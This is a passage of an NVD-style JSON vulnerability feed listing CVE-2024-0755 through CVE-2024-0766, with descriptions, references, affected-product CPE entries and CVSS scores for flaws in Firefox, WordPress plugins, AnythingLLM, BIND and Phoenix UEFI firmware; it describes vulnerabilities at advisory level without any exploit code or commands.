"vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:mozilla:firefox:*:*:*:*:*:*:*:*", "versionEndExcluding" : "122.0", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "REQUIRED", "scope" : "UNCHANGED", "confidentialityImpact" : "NONE", "integrityImpact" : "NONE", "availabilityImpact" : "HIGH", "baseScore" : 6.5, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 3.6 } }, "publishedDate" : "2024-01-23T14:15Z", "lastModifiedDate" : "2025-05-22T18:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0755", "ASSIGNER" : "security@mozilla.org" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "NVD-CWE-noinfo" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://bugzilla.mozilla.org/buglist.cgi?bug_id=1868456%2C1871445%2C1873701", "name" : "Memory safety bugs fixed in Firefox 122, Firefox ESR 115.7, and Thunderbird 115.7", "refsource" : "", "tags" : [ "Issue Tracking", "Permissions Required" ] }, { "url" : "https://bugzilla.mozilla.org/buglist.cgi?bug_id=1868456%2C1871445%2C1873701", "name" : "Memory safety bugs fixed in Firefox 122, Firefox ESR 115.7, and Thunderbird 115.7", "refsource" : "", "tags" : [ "Issue Tracking", "Permissions Required" ] }, { "url" : "https://lists.debian.org/debian-lts-announce/2024/01/msg00015.html", "name" : "https://lists.debian.org/debian-lts-announce/2024/01/msg00015.html", "refsource" : "", "tags" : [ "Mailing List", "Third Party Advisory" ] }, { "url" : "https://lists.debian.org/debian-lts-announce/2024/01/msg00015.html", "name" : "https://lists.debian.org/debian-lts-announce/2024/01/msg00015.html", "refsource" : "", "tags" : [ "Mailing List", "Third Party Advisory" ] }, { "url" : "https://lists.debian.org/debian-lts-announce/2024/01/msg00022.html", "name" : "https://lists.debian.org/debian-lts-announce/2024/01/msg00022.html", "refsource" : "", "tags" : [ "Mailing List", "Third Party Advisory" ] }, { "url" : "https://lists.debian.org/debian-lts-announce/2024/01/msg00022.html", "name" : "https://lists.debian.org/debian-lts-announce/2024/01/msg00022.html", "refsource" : "", "tags" : [ "Mailing List", "Third Party Advisory" ] }, { "url" : "https://www.mozilla.org/security/advisories/mfsa2024-01/", "name" : "https://www.mozilla.org/security/advisories/mfsa2024-01/", "refsource" : "", "tags" : [ "Vendor Advisory" ] }, { "url" : "https://www.mozilla.org/security/advisories/mfsa2024-01/", "name" : "https://www.mozilla.org/security/advisories/mfsa2024-01/", "refsource" : "", "tags" : [ "Vendor Advisory" ] }, { "url" : "https://www.mozilla.org/security/advisories/mfsa2024-02/", "name" : "https://www.mozilla.org/security/advisories/mfsa2024-02/", "refsource" : "", "tags" : [ "Vendor Advisory" ] }, { "url" : "https://www.mozilla.org/security/advisories/mfsa2024-02/", "name" : "https://www.mozilla.org/security/advisories/mfsa2024-02/", "refsource" : "", "tags" : [ "Vendor Advisory" ] }, { "url" : "https://www.mozilla.org/security/advisories/mfsa2024-04/", "name" : "https://www.mozilla.org/security/advisories/mfsa2024-04/", "refsource" : "", "tags" : [ "Vendor Advisory" ] }, { "url" : "https://www.mozilla.org/security/advisories/mfsa2024-04/", "name" : "https://www.mozilla.org/security/advisories/mfsa2024-04/", "refsource" : "", "tags" : [ "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Memory safety bugs present in Firefox 121, Firefox ESR 115.6, and Thunderbird 115.6. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability affects Firefox < 122, Firefox ESR < 115.7, and Thunderbird < 115.7." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:mozilla:firefox:*:*:*:*:*:*:*:*", "versionEndExcluding" : "122.0", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:mozilla:thunderbird:*:*:*:*:*:*:*:*", "versionEndExcluding" : "115.7", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:mozilla:firefox_esr:*:*:*:*:*:*:*:*", "versionEndExcluding" : "115.7", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "REQUIRED", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 8.8, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 2.8, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-23T14:15Z", "lastModifiedDate" : "2025-05-22T18:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0756", "ASSIGNER" : "contact@wpscan.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://wpscan.com/vulnerability/9130a42d-fca3-4f9c-ab97-d5e0a7a5cef2/", "name" : "https://wpscan.com/vulnerability/9130a42d-fca3-4f9c-ab97-d5e0a7a5cef2/", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://wpscan.com/vulnerability/9130a42d-fca3-4f9c-ab97-d5e0a7a5cef2/", "name" : "https://wpscan.com/vulnerability/9130a42d-fca3-4f9c-ab97-d5e0a7a5cef2/", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Insert or Embed Articulate Content into WordPress plugin through 4.3000000023 lacks validation of URLs when adding iframes, allowing attackers to inject an iFrame in the page and thus load arbitrary content from any page." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:elearningfreak:insert_or_embed_articulate_content:*:*:*:*:*:wordpress:*:*", "versionEndIncluding" : "4.3000000023", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 5.4, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.3, "impactScore" : 2.7 } }, "publishedDate" : "2024-06-04T15:15Z", "lastModifiedDate" : "2025-03-13T18:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0757", "ASSIGNER" : "contact@wpscan.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://wpscan.com/vulnerability/eccd017c-e442-46b6-b5e6-aec7bbd5f836/", "name" : "https://wpscan.com/vulnerability/eccd017c-e442-46b6-b5e6-aec7bbd5f836/", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://wpscan.com/vulnerability/eccd017c-e442-46b6-b5e6-aec7bbd5f836/", "name" : "https://wpscan.com/vulnerability/eccd017c-e442-46b6-b5e6-aec7bbd5f836/", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Insert or Embed Articulate Content into WordPress plugin through 4.3000000023 is not properly filtering which file extensions are allowed to be imported on the server, allowing the uploading of malicious code within zip files" } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:elearningfreak:insert_or_embed_articulate_content:*:*:*:*:*:wordpress:*:*", "versionEndIncluding" : "4.3000000023", "cpe_name" : [ ] } ] } ] }, "impact" : { }, "publishedDate" : "2024-06-04T06:15Z", "lastModifiedDate" : "2025-05-21T19:09Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0758", "ASSIGNER" : "disclosure@vulncheck.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/advisories/GHSA-2pwh-52h7-7j84", "name" : "https://github.com/advisories/GHSA-2pwh-52h7-7j84", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://github.com/advisories/GHSA-2pwh-52h7-7j84", "name" : "https://github.com/advisories/GHSA-2pwh-52h7-7j84", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://github.com/ipb-halle/MolecularFaces/security/advisories/GHSA-2pwh-52h7-7j84", "name" : "https://github.com/ipb-halle/MolecularFaces/security/advisories/GHSA-2pwh-52h7-7j84", "refsource" : "", "tags" : [ "Vendor Advisory" ] }, { "url" : "https://github.com/ipb-halle/MolecularFaces/security/advisories/GHSA-2pwh-52h7-7j84", "name" : "https://github.com/ipb-halle/MolecularFaces/security/advisories/GHSA-2pwh-52h7-7j84", "refsource" : "", "tags" : [ "Vendor Advisory" ] }, { "url" : "https://vulncheck.com/advisories/vc-advisory-GHSA-2pwh-52h7-7j84", "name" : "https://vulncheck.com/advisories/vc-advisory-GHSA-2pwh-52h7-7j84", "refsource" : "", "tags" : [ "Third Party Advisory", "US Government Resource" ] }, { "url" : "https://vulncheck.com/advisories/vc-advisory-GHSA-2pwh-52h7-7j84", "name" : "https://vulncheck.com/advisories/vc-advisory-GHSA-2pwh-52h7-7j84", "refsource" : "", "tags" : [ "Third Party Advisory", "US Government Resource" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "MolecularFaces before 0.3.0 is vulnerable to cross site scripting. A remote attacker can execute arbitrary JavaScript in the context of a victim browser via crafted molfiles.\n\n\n" } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:ipb-halle:molecularfaces:*:*:*:*:*:*:*:*", "versionEndExcluding" : "0.3.0", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 6.1, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 2.7 } }, "publishedDate" : "2024-01-19T21:15Z", "lastModifiedDate" : "2025-05-30T15:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0759", "ASSIGNER" : "security@huntr.dev" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/mintplex-labs/anything-llm/commit/0db6c3b2aa1787a7054ffdaba975474f122c20eb", "name" : "https://github.com/mintplex-labs/anything-llm/commit/0db6c3b2aa1787a7054ffdaba975474f122c20eb", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://github.com/mintplex-labs/anything-llm/commit/0db6c3b2aa1787a7054ffdaba975474f122c20eb", "name" : "https://github.com/mintplex-labs/anything-llm/commit/0db6c3b2aa1787a7054ffdaba975474f122c20eb", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://huntr.com/bounties/9a978edd-ac94-41fc-8e3e-c35441bdd12b", "name" : "https://huntr.com/bounties/9a978edd-ac94-41fc-8e3e-c35441bdd12b", "refsource" : "", "tags" : [ "Exploit" ] }, { "url" : "https://huntr.com/bounties/9a978edd-ac94-41fc-8e3e-c35441bdd12b", "name" : "https://huntr.com/bounties/9a978edd-ac94-41fc-8e3e-c35441bdd12b", "refsource" : "", "tags" : [ "Exploit" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Should an instance of AnythingLLM be hosted on an internal network and the attacked be explicitly granted a permission level of manager or admin, they could link-scrape internally resolving IPs of other services that are on the same network as AnythingLLM.\n\nThis would require the attacker also be able to guess these internal IPs as `/*` ranging is not possible, but could be brute forced.\n\nThere is a duty of care that other services on the same network would not be fully open and accessible via a simple CuRL with zero authentication as it is not possible to set headers or access via the link collector." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:mintplexlabs:anythingllm:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.0.0", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "NONE", "availabilityImpact" : "NONE", "baseScore" : 7.5, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 3.9, "impactScore" : 3.6 } }, "publishedDate" : "2024-02-27T06:15Z", "lastModifiedDate" : "2025-03-04T12:24Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0760", "ASSIGNER" : "security-officer@isc.org" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "http://www.openwall.com/lists/oss-security/2024/07/23/1", "name" : "http://www.openwall.com/lists/oss-security/2024/07/23/1", "refsource" : "", "tags" : [ ] }, { "url" : "http://www.openwall.com/lists/oss-security/2024/07/23/1", "name" : "http://www.openwall.com/lists/oss-security/2024/07/23/1", "refsource" : "", "tags" : [ ] }, { "url" : "http://www.openwall.com/lists/oss-security/2024/07/31/2", "name" : "http://www.openwall.com/lists/oss-security/2024/07/31/2", "refsource" : "", "tags" : [ ] }, { "url" : "https://kb.isc.org/docs/cve-2024-0760", "name" : "CVE-2024-0760", "refsource" : "", "tags" : [ ] }, { "url" : "https://kb.isc.org/docs/cve-2024-0760", "name" : "CVE-2024-0760", "refsource" : "", "tags" : [ ] }, { "url" : "https://security.netapp.com/advisory/ntap-20240731-0004/", "name" : "https://security.netapp.com/advisory/ntap-20240731-0004/", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A malicious client can send many DNS messages over TCP, potentially causing the server to become unstable while the attack is in progress. The server may recover after the attack ceases. Use of ACLs will not mitigate the attack. \nThis issue affects BIND 9 versions 9.18.1 through 9.18.27, 9.19.0 through 9.19.24, and 9.18.11-S1 through 9.18.27-S1." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2024-07-23T15:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0761", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-330" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/changeset/3023403/wp-file-manager/trunk/file_folder_manager.php?old=2984933&old_path=wp-file-manager%2Ftrunk%2Ffile_folder_manager.php", "name" : "https://plugins.trac.wordpress.org/changeset/3023403/wp-file-manager/trunk/file_folder_manager.php?old=2984933&old_path=wp-file-manager%2Ftrunk%2Ffile_folder_manager.php", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3023403/wp-file-manager/trunk/file_folder_manager.php?old=2984933&old_path=wp-file-manager%2Ftrunk%2Ffile_folder_manager.php", "name" : "https://plugins.trac.wordpress.org/changeset/3023403/wp-file-manager/trunk/file_folder_manager.php?old=2984933&old_path=wp-file-manager%2Ftrunk%2Ffile_folder_manager.php", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://wordpress.org/plugins/wp-file-manager/", "name" : "https://wordpress.org/plugins/wp-file-manager/", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://wordpress.org/plugins/wp-file-manager/", "name" : "https://wordpress.org/plugins/wp-file-manager/", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/1928f8e4-8bbe-4a3f-8284-aa12ca2f5176?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/1928f8e4-8bbe-4a3f-8284-aa12ca2f5176?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/1928f8e4-8bbe-4a3f-8284-aa12ca2f5176?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/1928f8e4-8bbe-4a3f-8284-aa12ca2f5176?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The File Manager plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 7.2.1 due to insufficient randomness in the backup filenames, which use a timestamp plus 4 random digits. This makes it possible for unauthenticated attackers, to extract sensitive data including site backups in configurations where the .htaccess file in the directory does not block access." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:filemanagerpro:file_manager:*:*:*:*:*:wordpress:*:*", "versionEndIncluding" : "7.2.1", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "NONE", "availabilityImpact" : "NONE", "baseScore" : 7.5, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 3.9, "impactScore" : 3.6 } }, "publishedDate" : "2024-02-05T22:16Z", "lastModifiedDate" : "2025-03-24T14:32Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0762", "ASSIGNER" : "pheonixtechnologies@example.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://eclypsium.com/blog/ueficanhazbufferoverflow-widespread-impact-from-vulnerability-in-popular-pc-and-server-firmware/", "name" : "https://eclypsium.com/blog/ueficanhazbufferoverflow-widespread-impact-from-vulnerability-in-popular-pc-and-server-firmware/", "refsource" : "", "tags" : [ ] }, { "url" : "https://eclypsium.com/blog/ueficanhazbufferoverflow-widespread-impact-from-vulnerability-in-popular-pc-and-server-firmware/", "name" : "https://eclypsium.com/blog/ueficanhazbufferoverflow-widespread-impact-from-vulnerability-in-popular-pc-and-server-firmware/", "refsource" : "", "tags" : [ ] }, { "url" : "https://news.ycombinator.com/item?id=40747852", "name" : "https://news.ycombinator.com/item?id=40747852", "refsource" : "", "tags" : [ ] }, { "url" : "https://news.ycombinator.com/item?id=40747852", "name" : "https://news.ycombinator.com/item?id=40747852", "refsource" : "", "tags" : [ ] }, { "url" : "https://phoenixtech.com/phoenix-security-notifications/CVE-2024-0762/", "name" : "https://phoenixtech.com/phoenix-security-notifications/CVE-2024-0762/", "refsource" : "", "tags" : [ ] }, { "url" : "https://www.phoenix.com/security-notifications/cve-2024-0762/", "name" : "https://www.phoenix.com/security-notifications/cve-2024-0762/", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Potential buffer overflow \nin unsafe UEFI variable handling \n\nin Phoenix SecureCore™ for select Intel platforms\n\n\nThis issue affects:\n\n\nPhoenix \n\nSecureCore™ for Intel Kaby Lake: from 4.0.1.1 before 4.0.1.998;\n\n\nPhoenix \n\nSecureCore™ for Intel Coffee Lake: from 4.1.0.1 before 4.1.0.562;\n\n\nPhoenix \n\nSecureCore™ for Intel Ice Lake: from 4.2.0.1 before 4.2.0.323;\n\n\nPhoenix \n\nSecureCore™ for Intel Comet Lake: from 4.2.1.1 before 4.2.1.287;\n\n\nPhoenix \n\nSecureCore™ for Intel Tiger Lake: from 4.3.0.1 before 4.3.0.236;\n\n\nPhoenix \n\nSecureCore™ for Intel Jasper Lake: from 4.3.1.1 before 4.3.1.184;\n\n\nPhoenix \n\nSecureCore™ for Intel Alder Lake: from 4.4.0.1 before 4.4.0.269;\n\n\nPhoenix \n\nSecureCore™ for Intel Raptor Lake: from 4.5.0.1 before 4.5.0.218;\n\n\nPhoenix \n\nSecureCore™ for Intel Meteor Lake: from 4.5.1.1 before 4.5.1.15." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2024-05-14T16:15Z", "lastModifiedDate" : "2025-07-28T21:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0763", "ASSIGNER" : "security@huntr.dev" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-22" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/mintplex-labs/anything-llm/commit/8a7324d0e77a15186e1ad5e5119fca4fb224c39c", "name" : "https://github.com/mintplex-labs/anything-llm/commit/8a7324d0e77a15186e1ad5e5119fca4fb224c39c", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://github.com/mintplex-labs/anything-llm/commit/8a7324d0e77a15186e1ad5e5119fca4fb224c39c", "name" : "https://github.com/mintplex-labs/anything-llm/commit/8a7324d0e77a15186e1ad5e5119fca4fb224c39c", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://huntr.com/bounties/25a2f487-5a9c-4c7f-a2d3-b0527db73ea5", "name" : "https://huntr.com/bounties/25a2f487-5a9c-4c7f-a2d3-b0527db73ea5", "refsource" : "", "tags" : [ "Exploit" ] }, { "url" : "https://huntr.com/bounties/25a2f487-5a9c-4c7f-a2d3-b0527db73ea5", "name" : "https://huntr.com/bounties/25a2f487-5a9c-4c7f-a2d3-b0527db73ea5", "refsource" : "", "tags" : [ "Exploit" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Any user can delete an arbitrary folder (recursively) on a remote server due to bad input sanitization leading to path traversal. The attacker would need access to the server at some privilege level since this endpoint is protected and requires authorization." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:mintplexlabs:anythingllm:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.0.0", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "NONE", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 8.1, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 2.8, "impactScore" : 5.2 } }, "publishedDate" : "2024-02-27T22:15Z", "lastModifiedDate" : "2025-03-27T11:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0765", "ASSIGNER" : "security@huntr.dev" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/mintplex-labs/anything-llm/commit/08d33cfd8fc47c5052b6ea29597c964a9da641e2", "name" : "https://github.com/mintplex-labs/anything-llm/commit/08d33cfd8fc47c5052b6ea29597c964a9da641e2", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://github.com/mintplex-labs/anything-llm/commit/08d33cfd8fc47c5052b6ea29597c964a9da641e2", "name" : "https://github.com/mintplex-labs/anything-llm/commit/08d33cfd8fc47c5052b6ea29597c964a9da641e2", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://huntr.com/bounties/8978ab27-710c-44ce-bfd8-a2ea416dc786", "name" : "https://huntr.com/bounties/8978ab27-710c-44ce-bfd8-a2ea416dc786", "refsource" : "", "tags" : [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ] }, { "url" : "https://huntr.com/bounties/8978ab27-710c-44ce-bfd8-a2ea416dc786", "name" : "https://huntr.com/bounties/8978ab27-710c-44ce-bfd8-a2ea416dc786", "refsource" : "", "tags" : [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "As a default user on a multi-user instance of AnythingLLM, you could execute a call to the `/export-data` endpoint of the system and then unzip and read that export that would enable you do exfiltrate data of the system at that save state.\n\nThis would require the attacked to be granted explicit access to the system, but they can do this at any role. Additionally, post-download, the data is deleted so no evidence would exist that the exfiltration occured." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:mintplexlabs:anythingllm:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.0.0", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "NONE", "availabilityImpact" : "NONE", "baseScore" : 6.5, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 3.6 } }, "publishedDate" : "2024-03-03T15:15Z", "lastModifiedDate" : "2025-01-08T14:32Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0766", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-862" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/browser/envo-elementor-for-woocommerce/trunk/includes/admin/include/template-library.php", "name" : "https://plugins.trac.wordpress.org/browser/envo-elementor-for-woocommerce/trunk/includes/admin/include/template-library.php", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/envo-elementor-for-woocommerce/trunk/includes/admin/include/template-library.php", "name" : "https://plugins.trac.wordpress.org/browser/envo-elementor-for-woocommerce/trunk/includes/admin/include/template-library.php", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/996c7433-dd82-4216-86b9-005f43c06c3a?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/996c7433-dd82-4216-86b9-005f43c06c3a?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/996c7433-dd82-4216-86b9-005f43c06c3a?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/996c7433-dd82-4216-86b9-005f43c06c3a?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Envo's Elementor Templates & Widgets for WooCommerce plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the templates_ajax_request function in all versions up to, and including, 1.4.4. This makes it possible for subscribers and higher to create templates." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:envothemes:envo\\'s_elementor_templates_\\&_widgets_for_woocommerce:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "1.4.5", "cpe_name" : [ ] } ] } ] }, "impact" : { }, "publishedDate" : 